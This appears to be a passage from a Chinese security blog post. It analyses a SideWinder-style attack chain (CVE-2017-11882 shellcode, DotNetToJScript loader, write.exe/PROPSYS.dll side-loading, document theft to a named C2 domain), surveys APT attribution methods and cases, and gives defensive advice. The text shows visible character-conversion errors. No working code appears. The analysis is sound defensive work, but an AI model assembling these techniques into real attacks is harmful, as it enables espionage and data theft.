诱饵文档包括假装成国家部门发往各国驻华使馆的邀请函、某科技有限公司驻外表明处的安全工做手册修订文档。两个诱饵文档均在末尾嵌入一个名为“包装程序外壳对象”的对象，对象属性指向%temp%目录中的1.a文件。因此，打开文档会在%temp%目录下释放由JaveScript脚本编写的1.a文件。

接着诱饵文档又利用漏洞CVE-2017-11882触发shellcode执行1.a。

Shellcode流程以下：
经过异或0×12解密出一个JavaScript脚本，该脚本的主要功能是执行%temp%目录下的1.a文件。JavaScript脚本密文以下图所示：

解密后的JavaScript脚本以下图所示：

ShellCode会将公式编辑器的命令行参数改为JavaScript脚本，利用RunHTMLApplication函数执行将该脚本执行起来。执行JavaScript以下图所示：

(2) 病毒分析

1.a文件分析
该文件是经过开源的DotNetToJScript工具生成，主要功能是经过JavaScript脚本内存执行.net的DLL文件。该脚本首先解密出StInstaller.dll文件，并反射加载该DLL中的work函数。Work函数对传进来的参数x（参数1）和y（参数2）进行解密，解密后x为PROPSYS.dll，y为V1nK38w.tmp。1.a脚本内容以下图所示：

StInstaller.dll文件分析
StInstaller.dll是一个.NET程序，会建立工做目录C:\ProgramData\AuthyFiles，而后在工做目录中释放3个文件，分别是PROPSYS.dll、V1nK38w.tmp和write.exe.config，并将系统目录下的写字板程序(write.exe) 拷贝到该目录中。运行write.exe(白文件)加载同级目录下的PROPSYS.dll(黑文件), 经过白加黑的手段运行恶意代码。work函数以下图所示：

详细过程：

在work函数中调用xorIt解密函数获得3个重要配置数据，分别是工做目录名AuthyFiles，域名https://trans-can.net和设置的注册表键名authy。
建立工做目录C:\ProgramData\AuthyFiles，拷贝系统文件write.exe到工做目录，并将其设置为开机自启动。建立AuthyFiles和write.exe以下图所示：

在工做目录中释放一个随机命名的文件V1nK38w.tmp。
在工做目录中释放PROPSYS.dll，并更新该文件中接下来要加载程序的文件名为V1nK38w.tmp。建立PROPSYS.dll以下图所示：

将拼接后完整的url连接写入V1nK38w.tmp文件中，再将该文件使用EncodeData函数进行加密。建立V1nK38w.tmp文件代码以下图所示：

建立配置文件write.exe.config，防止不一样.NET版本出现兼容性问题。write.exe.config内容以下：

执行C:\ProgramData\AuthyFiles\write.exe，调用恶意的PROPSYS.dll。

(3) PROPSYS.dll文件分析
使用DecodeData函数对V1nK38w.tmp进行解密，解密完后加载执行V1nK38w.tmp。

DecodeData解密函数以下图所示：

(4) V1nK38w.tmp文件分析
V1Nk38w.tmp主要是窃取大量信息和接收指令执行。其主要行为以下：

加载初始配置，配置由资源中的Default解密获得。配置内容是网址，上传文件的暂存目录和窃取指定的文件后缀名(doc,docx, xls, xlsx, pdf, ppt, pptx)。解密后的Default资源信息以下：

将配置使用EncodeData函数加密，存于注册表HKCU\Sotfware\Authy中。在注册表中加密的配置信息在注册表中加密的配置信息以下：

访问指定地址下载文件执行，优先选择配置信息中的网址，若是没有则选择默认网址。

将窃取的信息整合成文件，文件命名为：随机字符串+特定后缀，数据内容以明文形式存于暂存目录中。窃取信息文件以下图所示：

后缀为.sif的文件主要是存储的是系统信息、安装程序信息、磁盘信息等。

更新注册表中存储的配置数据：首先遍历系统找寻和特定后缀相同的文件，而后从注册表HKCU\Sotfware\Authy读取和解密配置数据，将找到的文件的名字和路径补充到配置数据中，最后将配置信息加密继续存放注册表。记录要上传的文档路径以下所示：

上传指定后缀文档。

更新注册表中存储的配置数据：将上传文件的信息更新到注册表配置数据中。

将注册表配置信息中记载的特定后缀文件的数据内容所有压缩上传。上传暂存目录中后缀为sif、flc、err和fls的文件。

总结：这次两起攻击事件时隔不长，攻击目标均指向我国的相关机构，攻击目的以获取机构重要信息为主，以便制定有针对性的下一步攻击方案。最近揭露的响尾蛇攻击对象大都指向巴基斯坦和东南亚各国，但这两起攻击事件目标直指中国，代表该组织攻击目标发生了变化，加大了对中国的攻击力度。国内相关机构和企业单位务必要引发高度重视，增强预防措施。

三.APT攻击溯源及案例

1.溯源常见方法

溯源意图除了溯源出编写恶意代码做者、恶意代码家族以外，还要挖掘出攻击者及攻击者背后的真正意图，从而遏制攻击者的进一步行动。360威胁情报中心将基于每一个APT攻击事件的背景信息、攻击组织、相关TTPs（Tactics, Techniques and Procedures，战术、技术与步骤）进行描述及重大攻击事件溯源。在溯源过程当中，越往上溯源越难，尤为是如何定位APT组织的人员。

恶意样本的追踪溯源须要以当前的恶意样本为中心，经过对静态特征和动态行为的分析，解决以下问题：

谁发动的攻击？
攻击背景是什么？
攻击的意图是什么？
谁编写的样本？
样本使用了哪些攻击技术？
攻击过程当中使用了那些攻击工具？
整个攻击过程路径是怎样的？

恶意样本追踪溯源能够采起以下方法：

全流量分析
同源分析
入侵日志
域名/IP
攻击模型

在特征提取上，产业界更倾向于从代码结构、攻击链中提取类似性特征；在同源断定上，除了采用与已有的历史样本进行类似度聚类分析以外，产业界还会采用一些关联性分析方法。相比学术界溯源特征，产业界溯源特征更加详细全面，信息复杂度大。所以，学术界的同源断定方法并不能彻底用于产业界各种特征的类似性分析中，常见产业界溯源方法分类以下表所示。

同时，简单补充下美国应急响应中心的溯源方法。

对被入侵的主机进行还原取证
对木马样本进行代码的逆向分析与解密
对流经国家的数据在传输层进行特征码布控，并存储至少半年的流经数据流量，以便还原攻击
对VPS代理服务提供商与正常网络服务提供商，二者有能力区分，并能落地VPS代理服务提供商的用户背后真实IP地址
分辨出攻击事件背后的组织，并断定组织的来源、分工、资源情况、人员构成、行动目标等要素

最后推荐att&ack网站，很是棒的一个APT组织分析网站。

PS：参考前文 [网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析

2.基于机器学习和深度学习的APT溯源

学术界旨在采用静态或动态的方式获取恶意代码的特征信息，经过对恶意代码的特征学习，创建不一样类别恶意代码的特征模型，经过计算待检测恶意代码针对不一样特征类别的类似性度量，指导恶意代码的同源性断定。常见的恶意代码溯源主要包括4个阶段：特征提取、特征预处理、类似性计算、同源断定，各阶段间的流程关系以下图所示。

上图是将溯源对象Windows平台的PE恶意文件或Android平台的APK恶意文件输入溯源系统，通过特征提取、特征预处理、类似性计算、同源分析获取溯源结果，最终断定攻击家族或做者。

(1) 特征提取
特征提取是溯源分析过程的基础，具备同源性的恶意代码是经过它们的共有特征与其余代码区分开来的。所提取的特征既要反映出恶意代码的本质和具备同源性恶意代码之间的类似性，又要知足提取的有效性。

依据溯源目的，溯源特征提取包括溯源家族的特征提取和溯源做者的特征提取。Faruki等在字节码级别提取统计性强的序列特征，包括指令、操做码、字节码、API代码序列等。Perdisci R等经过n-gram提取字节码序列做为特征。Ki Y等提出了捕获运行过程当中的API序列做为特征，利用生物基因序列检测工具ClustalX对API序列进行类似性分析，获得恶意代码的同源性断定。DNADroid使用PDG做为特征，DroidSim是一种基于组件的CFG来表示类似性代码特征，与早期的方法相比，该系统检测代码重用更准确。

(2) 特征预处理

特征提取过程当中会遇到不具备表明性、不能量化的原始特征，特征预处理针对这一问题进行解决，以提取出适用于类似性计算的表明性特征。特征预处理一方面对初始特征进行预处理，另外一方面为类似性计算提供基础数据。常见的特征类型包括序列特征和代码结构特征。

序列特征预处理： 包括信息熵评估、正则表达式转换、N-grams序列、序列向量化、权重量化法等，序列特征预处理会将初始特征中冗余特征消除、特征语义表达式加强、特征量化等以便于进行类似性计算。L. Wu经过分析恶意软件敏感API操做以及事件等，将API序列特征转换为正则表达式，并在发生相似的正则表达式模式时检测恶意代码。IBM研究小组先将N-gram方法应用于恶意软件分析中，使用N-gram的统计属性预测给定序列中下个子序列，从而进行类似度计算。Kolosnjaji等提出对API调用序列进行N-gram处理获取子序列，采用N-gram方法将API调用序列转换为N-gram序列，实现过程下图所示。

代码结构特征预处理： 在类似度比较时存在边、节点等匹配问题即子图同构算法复杂性，同时代码结构特征中存在冗余结构，所以除去冗余、保留与恶意操做相关的代码结构是预处理的主要目的。常见的方法包括API调用图预处理、CFG图预处理、PDG图预处理等。

(3) 类似性计算

溯源旨在经过分析样本的同源性定位到家族或做者，样本的同源性能够经过分析代码类似性来获取。类似性计算旨在衡量恶意代码间类似度，具体为采用一种类似性模型对恶意代码的特征进行运算。根据预处理特征类型的不一样以及溯源需求、效率、准确性等差别，采用不一样的类似性运算方法。

目前比较流行的类似性计算方法主要集中在对集合、序列、向量、图等特征表现形式的处理。Qiao等基于集合计算类似性，在不一样恶意样本API集合的类似性比较中采用了Jaccard系数方法，将为A、B两个集合的交集在并集中所占的比例做为类似度，比例值越大，证实越类似，如公式所示。

Faruki等提出了采用SDhash类似性散列技术构建样本的签名序列，并采用汉明距离法对序列进行类似性计算，从而识别同源性样本。Suarez-Tangil 等用数据挖掘算法中向量空间模型展现家族的恶意代码特征形式，将同家族提取出来的具备表明性的CFG元素做为特征中维度，采用余弦算法对不一样家族的向量空间模型进行类似度计算，根据余弦值来判断它们的类似性，从而识别出类似性样本，进而归属到对应的家族。用于比较向量的余弦类似度反映了恶意代码间的类似性，其具体公式如公式所示。

Cesare等提出了最小距离匹配度量法，比较不一样样本的CFG图特征的类似性。Kinable等经过静态分析恶意代码的系统调用图，采用图匹配的方式计算图类似性得分，该得分近似于图的编辑距离。利用该得分比较样本的类似性，采用聚类算法将样本进行聚类，实现家族分类。

(4) 同源断定

学术界常见的同源断定方法主要包括基于聚类算法的同源断定、基于神经网络的同源断定等。Kim等采用DBSCAN算法对基于调用图聚类，发现相似的恶意软件。Feizollah等提出采用层聚类算法，构建家族间演化模型，进而发掘家族功能的演化。Niu等提出了层次聚类和密度聚类算法结合的快速聚类算法对操做码序列特征进行聚类，以识别恶意软件变体，该方法识别变体效率较高。

神经网络是一种多层网络的机器学习算法，能够处理多特征以及复杂特征的同源断定。基本思想为：将样本特征做为输入层数据，而后不断调整神经网络参数，直到输出的样本与该样本是一种同源关系未为止。它会将恶意代码特征送输入层，便可判断恶意代码的同源性.。赵炳麟等提出了基于神经网络的同源断定方法，其总体实现框架以下图所示。

3.时区溯源案例（白象）

在过去的四年中，安天的工程师们关注到了中国的机构和用户反复遭遇来自“西南方向”的网络入侵尝试。这些攻击虽进行了一些掩盖和假装，咱们依然能够将其推理回原点——来自南亚次大陆的某个国家。

参考文章：白象的舞步——来自南亚次大陆的网络攻击

安天在2014年4月相关文章中披露的针对中国两所大学被攻击的事件，涉及如下六个样本。其中五个样本投放至同一个目标，这些样本间呈现出模块组合做业的特色。

4号样本是初始投放样本，其具备下载其余样本功能
3号样本提取主机相关信息生成日志文件
5号样本负责上传
6号样本采集相关文档文件信息
2号样本则是一个键盘记录器

那么，如何溯源该组织所来自的区域呢？
安天经过对样本集的时间戳、时区分析进行分析，发现其来自南亚。样本时间戳是一个十六进制的数据，存储在PE文件头里，该值通常由编译器在开发者建立可执行文件时自动生成，时间单位细化到秒，一般能够认为该值为样本生成时间（GMT时间）。

时间戳的分析须要收集全部可用的可执行文件时间戳，并剔除过早的和明显人为修改的时间，再将其根据特定标准分组统计，如每周的天或小时，并以图形的形式体现，下图是经过小时分组统计结果：

从上图的统计结果来看，若是假设攻击者的工做时间是早上八九点至下午五六点的话，那么将工做时间匹配到一个来自UTC+4或UTC+5时区的攻击者的工做时间。根据咱们匹配的攻击者所在时区（UTC+4 或UTC+5），再对照世界时区分布图，就能够来推断攻击者所在的区域或国家。

接着对该攻击组织进行更深刻的分析。对这一攻击组织继续综合线索，基于互联网公开信息，进行了画像分析，认为这是一个由10~16人的组成的攻击小组。其中六人的用户ID是cr01nk 、neeru rana、andrew、Yash、Ita nagar、Naga。

在安天的跟踪分析中，发现该组织的部分C&C地址是一些正常的网站，通过分析咱们认为，有可能该组织入侵了这些网站，将本身的C&C服务控制代码放到它们的服务器上，以此来隐藏本身的IP信息。同时这种方式还会使安全软件认为链接的是正常的网站，而不会触发安全警报。

基于现有资源能够分析出，“白象二代”组织一名开发人员的ID为“Kanishk”，经过维基百科查询到一个相似单词“Kanishka”，这是一个是梵文译音，中文翻译为“迦腻色迦”，迦腻色伽是贵霜帝国（Kushan Empire）的君主，贵霜帝国主要控制范围在印度河流域。至此推测该APT组织来自南亚某国。

经过这个案例，咱们能够经过时区、公开信息、黑客ID、C&C域名进行溯源，并一步步递进。

4.关联分析案例（Darkhotel APT-C-06）

Darkhotel（APT-C-06）是一个长期针对企业高管、GF工业、电子工业等重要机构实施网络攻击活动的APT组织。2014年11月，卡巴斯基实验室的安全专家首次发现了Darkhotel APT组织，并声明该组织至少从2010年就已经开始活跃，目标基本锁定在韩国、中国、俄罗斯和日本。360威胁情报中心对该团伙的活动一直保持着持续跟踪，其还远的攻击流程以下图所示。

参考文字：DarkHotel APT团伙新近活动的样本分析

溯源方法：经过对样本中使用的特殊代码结构、域名/IP等的关联分析，以及使用360威胁情报中心分析平台对相关样本和网络基础设施进行拓展，推断攻击的幕后团伙为Darkhotel（APT-C-06）。

(1) 网络内容合法性算法关联
在分析的msfte.dll样本中咱们注意到一段比较特殊的校验获取网络内容的合法性的算法，经过对使用了相同算法的样本关联分析，咱们发现了另外两种形式的Dropper样本，分别是EXE和图片文件捆绑执行的样本，以及经过Lnk快捷方式执行的样本，他们都使用了类似的代码结构，能够确认这两种形式的Dropper样本和本次分析的样本出自同一团伙之手，好比特殊的校验获取的网络内容合法性算法部分彻底一致。

下图为样本A（wuauctl.exe）和样本B(cala32.exe)的代码。

(2) 域名关联分析指向DarkHotel

进一步分析使用Lnk快捷方式执行恶意代码的样本，能够看到都使用了彻底一致的命令行参数和代码。

习惯性的使用360威胁情报中心数据平台搜索样本中用于下载恶意脚本的两个域名，能够看到相关域名正是360威胁情报中心内部长期跟踪的Darkhotel APT团伙使用的域名，相关域名早已经被打上Darkhotel的标签。

(3) 溯源关联图
360威胁情报中心经过大数据关联，对 DarkHotel APT团伙近年来使用的多个Loader版本进行了整理分析，经过分析大体能够看到该Loader历经了三个开发周期。以简单的GetCC函数为例，能够看到代码总体逻辑是没有区别的：

只是增长了对应的混淆还原处理。

下图为溯源关联图。

5.特征类似溯源（摩诃草）

在某次APT攻击中，360安全团队发现其与摩诃草APT组织旗下的CNC小组有着不少的联系。那么是怎么发现的呢？某些安全人员或APT组织写的代码都有本身的特点，咱们经过对比这些代码DNA的类似性或特征，可以判断其攻击的来源。

CNC小组取名来自360于2019年末发布的报告《南亚地区APT组织2019年度攻击活动总结》中说起的摩诃草使用新的远程控制木马，同时经过其pdb路径信息中包含了 cnc_client 的字样，故命名为cnc_client小组。在这次活动中，该组织的特征与之高度相似，故团队猜想该活动的做俑者来源于摩诃草旗下的CNC小组。

下面简单介绍类似的地方，左图来自于360的年度报告，右图来自于本次活动的截图。

(1) 反向shell功能类似性

(2) 文件上传功能类似性

(3) 文件下载功能类似性

而且在连域名中出现了cnc的字眼，故Gcow安全小组大胆猜想该小组对原先的cnc_client进行了进一步的修改，可是其主体逻辑框架保持不变。在侧面上反应了该组织也很积极的修改相关的恶意软件代码以躲避杀毒软件的检测。

6.0day漏洞溯源（Lazarus T-APT-15）

Lazarus（T-APT-15）组织是来自朝鲜的APT组织，该组织长期对韩国、美国进行渗透攻击，此外还对全球的金融机构进行攻击，堪称全球金融机构的最大威胁。该组织最先的攻击活动能够追溯到2007年。据国外安全公司的调查显示，Lazarus组织与2014 年索尼影业遭黑客攻击事件，2016 年孟加拉国银行数据泄露事件，2017年美国国防承包商、美国能源部门及英国、韩国等比特币交易所被攻击等事件有关。而2017年席卷全球的最臭名昭著的安全事件“Wannacry”勒索病毒也被怀疑是该组织所为。

近日腾讯御见威胁情报中心监测到多个利用最新Flash漏洞CVE-2018-4878发动的攻击。攻击对象为数字货币交易所等，攻击事件所使用的样本都是docx文件，docx文件内嵌了一个包含漏洞攻击swf文件的doc文档。经分析，发现该恶意文档卸载的载荷为FALLCHILL远程控制木马最新变种，FALLCHILL木马是朝鲜的黑客组织Lazarus开发并使用的木马。

参考文章：Lazarus APT组织最新活动揭露

通过分析溯源，发现该RAT代码与FALLCHILL木马具备较高的类似度，在部分代码细节、远控命令分发、整体逻辑流程上具备很是明显的类似性。在api加密、通信协议假装上有较大变种改进。FALLCHILL木马被认为是朝鲜背景的APT组织Lazarus Group 所用。该RAT文件的资源语言为朝鲜语，也从侧面印证与Lazarus组织的相关性。

从Adobe漏洞公告致谢来看，CVE-2018-4878这个漏洞的野外攻击样本最先是由韩国计算机应急响应小组（KR-CERT）发现的，而KR-CERT也表示，来自朝鲜的黑客组织已经成功利用这个0Day漏洞发起攻击，与Lazarus主要攻击目标一致。

部分特征代码及其类似以下：

此外，咱们经过本次攻击样本与历史样本进行关联分析，发现此版本FALLCHILL最先出现于2017年初，经过样本的出现时间和C2的活跃时间能够发现该组织是持续活跃的。

7.蜜罐溯源

蜜罐技术本质上是一种对攻击方进行欺骗的技术，经过布置一些做为诱饵的主机、网络服务或者信息，诱使攻击方对它们实施攻击，从而能够对攻击行为进行捕获和分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，可以让防护方清晰地了解他们所面对的安全威胁，并经过技术和管理手段来加强实际系统的安全防御能力。

蜜罐比如是情报收集系统。蜜罐好像是故意让人攻击的目标，引诱黑客前来攻击。因此攻击者入侵后，你就能够知道他是如何得逞的，随时了解针对服务器发动的最新的攻击和漏洞。还能够经过窃听黑客之间的联系，收集黑客所用的种种工具，而且掌握他们的社交网络。

参考文章：揭秘Patchwork APT攻击：一个与中国南海和东南亚问题相关的网络攻击组织

为了捕获攻击者发起的第二阶段攻击程序，观察其在内网中的渗透活动，咱们建立了一个真实网络环境，这个环境让攻击者以为他们已经成功获取了主机权限。零星的诱饵数据可让攻击者向另外一主机转移，这些数据能够是存储凭据，共享文件夹、浏览器cookies，VPN配置等其它信息。最终咱们利用了Cymmetria’s MazeRunner 系统成功捕获了攻击者的活动。

从攻击者C&C控制服务器中得到的信息，咱们经过另外一个合做伙伴，成功地接手并控制了攻击者的一个C&C服务器，服务器中包含了大量文件，并且这些钓鱼文件内容都与中国主题或性质相关。

种类多样的PPS文件–用做钓鱼攻击的恶意文件
大量的恶意代码包

四.安全防护建议

安全防护建议以下：

不打开可疑邮件，不下载可疑附件
此类攻击最开始的入口一般都是钓鱼邮件，钓鱼邮件很是具备迷惑性，所以须要用户提升警戒，企业更是要增强员工网络安全意识的培训。
部署网络安全态势感知、预警系统等网关安全产品
网关安全产品可利用威胁情报追溯威胁行为轨迹，帮助用户进行威胁行为分析、定位威胁源和目的，追溯攻击的手段和路径，从源头解决网络威胁，最大范围内发现被攻击的节点，帮助企业更快响应和处理。
安装有效的杀毒软件，拦截查杀恶意文档和木马病毒
杀毒软件可拦截恶意文档和木马病毒，若是用户不当心下载了恶意文档，杀毒软件可拦截查杀，阻止病毒运行，保护用户的终端安全。
及时修补系统补丁和重要软件的补丁
当心处理Office文档，除非确认文档来源可靠，充分了解打开文档的后果，不然务必不要开启Office启用宏代码
使用云沙箱和本地安全软件对可疑文件进行检测
提高安全意识，尤为内部人员的安全意识

同时，补充异常网络行为常见的判断方法：

端口与协议不匹配，如使用443端口传输明文协议
边界VPN拨入的IP地址不在企业用户VPN经常使用IP地址之列
利用VPS服务提供商的代理IP地址访问企业用的边界VPN拨入内网
Windows事件日志中的特殊ID编号，如ID 5140一般是PSEXEC（内网hash传递工具）日志
对于特殊协议要记录访问主机IP、目的主机IP，如SMB协议（永恒之蓝）要倍加防范

五.总结

写到这里，这篇文章就介绍完毕，但愿您喜欢这篇文章。最近分享了两场讲座，一个是安全，一个是大数据，但愿能将本身这些年在大数据、知识图谱、系统安全及人工智能应用到家乡这片土地，哈哈！

这篇文章中若是存在一些不足，还请海涵。做者做为网络安全初学者的慢慢成长路吧！但愿将来能更透彻撰写相关文章。同时很是感谢参考文献中的安全厂商和大佬们的文章分享，深知本身很菜，得努力前行。

欢迎你们讨论，是否以为这系列文章帮助到您！任何建议均可以评论告知读者，共勉。

(By:Eastmount 2020-05-11 下午6点写于贵阳 http://blog.csdn.net/eastmount/ )